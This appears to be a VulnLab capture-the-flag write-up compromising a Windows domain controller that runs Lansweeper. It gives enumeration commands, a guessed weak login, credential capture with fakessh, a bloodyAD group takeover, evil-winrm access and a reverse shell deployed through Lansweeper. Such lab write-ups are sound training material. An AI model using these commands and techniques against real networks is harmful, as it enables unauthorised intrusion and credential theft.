VL-Sweep

Initial Reconnaissance

First, I conducted a port scan to identify open services on the target:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
PORT      STATE SERVICE           REASON          VERSION
53/tcp    open  domain            syn-ack ttl 127 Simple DNS Plus
81/tcp    open  http              syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 
82/tcp    open  ssl/http          syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
88/tcp    open  kerberos-sec      syn-ack ttl 127 Microsoft Windows Kerberos 
135/tcp   open  msrpc             syn-ack ttl 127 Microsoft Windows RPC
139/tcp   open  netbios-ssn       syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp   open  ldap              syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: sweep.vl0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?     syn-ack ttl 127
464/tcp   open  kpasswd5?         syn-ack ttl 127
636/tcp   open  ldapssl?          syn-ack ttl 127
3268/tcp  open  ldap              syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: sweep.vl0., Site: Default-First-Site-Name)
3269/tcp  open  globalcatLDAPssl? syn-ack ttl 127
3389/tcp  open  ms-wbt-server     syn-ack ttl 127 Microsoft Terminal Services
| rdp-ntlm-info: 
|   Target_Name: SWEEP
|   NetBIOS_Domain_Name: SWEEP
|   NetBIOS_Computer_Name: INVENTORY
|   DNS_Domain_Name: sweep.vl
|   DNS_Computer_Name: inventory.sweep.vl
|   Product_Version: 10.0.20348
|_  System_Time: 2025-04-10T22:49:54+00:00
5357/tcp  open  http              syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 
5985/tcp  open  http              syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 
9389/tcp  open  mc-nmf            syn-ack ttl 127 .NET Message Framing
49664/tcp open  msrpc             syn-ack ttl 127 Microsoft Windows RPC
49670/tcp open  msrpc             syn-ack ttl 127 Microsoft Windows RPC
49675/tcp open  ncacn_http        syn-ack ttl 127 Microsoft Windows RPC
49676/tcp open  msrpc             syn-ack ttl 127 Microsoft Windows RPC
49682/tcp open  msrpc             syn-ack ttl 127 Microsoft Windows RPC
49718/tcp open  msrpc             syn-ack ttl 127 Microsoft Windows RPC

I discovered that Lansweeper was running on port 81:
Lansweeper login page

Initial Access

During enumeration, I discovered that the target was vulnerable to null session authentication:

1
netexec smb 10.10.124.231 -u 'panos' -p '' --shares --users

Guest account discovered
I used lookupsid to enumerate valid usernames from the domain:

1
impacket-lookupsid sweeper.vl/panos:''@sweeper.vl -target 10.10.124.231 -no-pass

SID lookup results
The ‘intern’ account looked suspicious. I tried using the credentials ‘intern:intern’ on the Lansweeper login page and gained access:
Successful intern login

Privilege Escalation - User

With access to the ‘intern’ account, I enumerated SMB shares:

1
netexec smb 10.10.124.231 -u 'intern' -p 'intern' --shares

SMB shares available to intern
I examined the Lansweeper share but didn’t find anything immediately useful:

1
smbclient //10.10.124.231/Lansweeper$ -U intern

Lansweeper share contents
Next, I used BloodHound to map the Active Directory environment:

1
netexec ldap 10.10.124.231 -u 'intern' -p 'intern' --bloodhound --dns-server 10.10.124.231 -c ALL --dns-tcp

BloodHound enumeration
Two accounts stood out as particularly interesting: svc_inventory_lnx and jgre808.

Exploiting Lansweeper

After logging in with intern:intern credentials, I explored the Lansweeper dashboard. I noticed that the account for Linux scanning had valid credentials, so I created a plan to intercept these credentials.
First, I created a scanning target pointing to my attack machine:
Creating a scan target
Then I set up a new mapping credential that would cause the Linux scan service account to connect to my machine:
Adding credential mapping
I also ensured my machine was marked as a Linux asset in the system:
Setting machine type to Linux
Using fakessh tool, I captured the username and password of the scanning service account when it attempted to connect to my machine:

1
fakessh ./

Captured service account credentials

Lateral Movement

Now with the svc_inventory_lnx credentials, I discovered this account had “GenericAll” privileges over the “LANSWEEPER ADMINS” group. I added the service account to this privileged group:

1
bloodyAD --host sweep.vl -u 'svc_inventory_lnx' -p '<PASS>' -d 'sweep.vl' add groupMember 'LANSWEEPER ADMINS' svc_inventory_lnx

With elevated privileges, I connected to the target using WinRM:

1
evil-winrm -i sweep.vl -u svc_inventory_lnx -p '<PASS>'

I was then able to access the user flag:

1
C:\> type user.txt

Privilege Escalation - Administrator

For the final privilege escalation, I logged into the Lansweeper application with the svc_inventory_lnx account, which now had administrative access.
I created another mapping credential targeting a Windows machine:
New mapping credential for Windows
Under the Deployment section, I created a new package that would allow me to execute commands on the target machine:
Creating deployment package
For the payload, I used a PowerShell reverse shell from revshells.com (PowerShell #2 option):
Setting up deployment payload
After clicking “Deploy Now” and selecting the appropriate asset:
Asset selection
I received a reverse shell with administrator privileges, completing the compromise:
Root access achieved
Share URL: https://api.vulnlab.com/api/v1/share?id=09c407ea-4484-4143-9d7b-866afabd26b4